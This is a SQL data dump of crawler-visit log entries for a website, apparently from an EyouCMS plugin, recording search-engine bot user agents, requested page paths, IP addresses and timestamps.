INSERT INTO `ey_weapp_spider_visit` VALUES ('98768', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_2/', '185.191.171.5', '1662333604', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98767', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.5', '1662333191', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98766', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.82', '1662333108', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98761', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/105.0.5195.102 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1662330080', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98764', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.82', '1662331943', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94439', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_3.html', '185.191.171.13', '1660276279', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94440', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/460.html', '185.191.171.12', '1660276491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98822', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/167.html', '116.179.32.233', '1662362598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98757', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/56.html', '66.249.79.108', '1662327724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98816', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.166', '1662360680', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98750', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1662323361', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98765', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/162.html', '216.244.66.194', '1662332850', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98810', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662357443', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98746', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '36.230.64.49', '1662318596', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98809', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.108', '1662357109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98748', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_9/', '185.191.171.39', '1662322158', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98745', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ass.html', '114.119.151.153', '1662318197', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98742', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jiayuguan.html', '114.119.151.155', '1662317609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98743', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/391.html', '114.119.151.155', '1662317757', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98744', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.9', '1662318151', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98825', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/370.html', '114.119.151.155', '1662364036', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98740', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/381.html', '207.46.13.213', '1662317315', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98751', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.110', '1662323661', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98739', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/491.html', '185.191.171.17', '1662317072', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98741', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/18.html', '114.119.151.155', '1662317330', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94437', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/310.html', '185.191.171.26', '1660275774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98828', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/277.html', '220.181.108.174', '1662364830', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98754', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.112', '1662324528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98737', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/409.html', '185.191.171.15', '1662315528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98731', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shangluo.html', '114.119.151.153', '1662313646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98730', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/88.html', '114.119.151.155', '1662313512', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98733', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/388.html', '185.191.171.4', '1662314228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98738', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/276.html', '220.181.108.155', '1662315567', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98752', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/105.0.5195.102 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1662324289', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98729', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xuzhoushi.html', '114.119.151.155', '1662313256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98727', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/87.html', '114.119.151.153', '1662313063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98725', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_6/', '114.119.151.153', '1662312647', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98756', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_7/', '185.191.171.1', '1662327397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98758', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/176.html', '185.191.171.37', '1662329345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98722', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jbzxw/', '114.119.151.155', '1662312301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98719', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/tbxw/', '114.119.151.155', '1662312005', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98717', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_19/', '114.119.151.153', '1662311777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98712', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/70.html', '114.119.151.155', '1662311203', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98710', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/141.html', '116.179.32.138', '1662307240', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98707', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/468.html', '216.244.66.194', '1662306175', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98705', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/30.html', '66.249.79.108', '1662306090', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98702', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.144', '1662304483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98704', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/173.html', '66.249.79.110', '1662305031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98700', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/list_4_3/', '66.249.79.108', '1662303768', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98701', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/344.html', '185.191.171.6', '1662304148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98698', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1662303294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98692', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/177_2.html', '185.191.171.21', '1662299885', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98690', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_5.html', '185.191.171.4', '1662298770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98691', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/72.html', '185.191.171.4', '1662299629', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98694', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/283.html', '220.181.108.102', '1662300921', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98695', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/220.html', '185.191.171.15', '1662300973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98714', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/kelamayi.html', '114.119.151.155', '1662311442', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98686', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/qiyexinwen', '220.181.108.91', '1662295572', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98688', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1662297492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98693', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/320.html', '116.179.32.68', '1662299890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98682', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_39/', '185.191.171.17', '1662294050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98685', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_27/', '185.191.171.38', '1662295502', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98679', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/jiaruwomen/', '220.181.108.165', '1662293231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98683', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/122.html', '220.181.108.103', '1662294334', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98684', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662295125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98676', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/156.html', '185.191.171.18', '1662291500', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98674', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662288842', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98672', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/nantongshi.html', '220.181.108.110', '1662285397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98671', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/117.html', '220.181.108.105', '1662285087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98675', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.112', '1662289551', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98669', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/286.html', '185.191.171.14', '1662283555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98677', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/266.html', '66.249.79.110', '1662291893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98667', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/98.html', '114.119.151.155', '1662280510', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98763', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/453.html', '185.191.171.10', '1662331270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98678', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1662292560', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98666', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.161', '1662279752', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98680', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/178.html', '185.191.171.17', '1662293349', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98662', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/369.html', '114.119.151.155', '1662274095', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98659', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/441.html', '220.181.108.81', '1662272770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98654', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/naqu.html', '114.119.151.155', '1662270625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98655', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/54.html', '185.191.171.5', '1662271138', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98647', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/434.html', '114.119.151.153', '1662267565', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98646', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.120', '1662267311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98650', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/pt.html', '114.119.151.155', '1662267967', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98656', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_48.html', '185.191.171.20', '1662271385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98648', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_4.html', '185.191.171.44', '1662267613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98641', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/116.html', '116.179.32.145', '1662264117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98640', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.153', '1662264041', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98639', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662263794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98637', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_50/', '185.191.171.23', '1662262105', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98634', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1662260847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98649', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/101.html', '114.119.151.155', '1662267648', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98633', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_8.html', '185.191.171.40', '1662259786', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98651', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/300.html', '216.244.66.194', '1662268656', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98630', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.86', '1662257787', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98645', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/165.html', '216.244.66.194', '1662266053', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98638', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '36.230.64.49', '1662263621', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98620', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bengche/', '114.119.151.153', '1662254253', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98625', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/228.html', '185.191.171.33', '1662254774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98611', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/128.html', '114.119.151.155', '1662250119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98613', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_13/', '114.119.151.153', '1662251971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98607', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/261.html', '185.191.171.7', '1662247939', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98608', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/309.html', '66.249.79.108', '1662247969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98609', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_45/', '185.191.171.18', '1662249178', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98610', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/178.html', '66.249.79.112', '1662249616', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98600', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/105.html', '114.119.151.153', '1662244760', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98598', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/165.html', '185.191.171.42', '1662244319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98597', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/chs.html', '114.119.151.155', '1662244118', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98596', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/gzs.html', '114.119.151.153', '1662243675', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98587', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.9', '1662237773', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98590', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/161.html', '185.191.171.20', '1662238676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98591', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_6.html', '185.191.171.42', '1662239141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98589', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/254.html', '116.179.32.151', '1662238214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98586', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662237276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98585', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/nanjingshi.html', '114.119.151.153', '1662237027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98583', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/277.html', '116.179.32.44', '1662235869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98604', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.112', '1662246710', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98580', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/366.html', '220.181.108.144', '1662231663', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98582', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_5.html', '185.191.171.25', '1662235414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98605', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.5', '1662247058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98614', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/266.html', '66.249.79.112', '1662252293', '0');
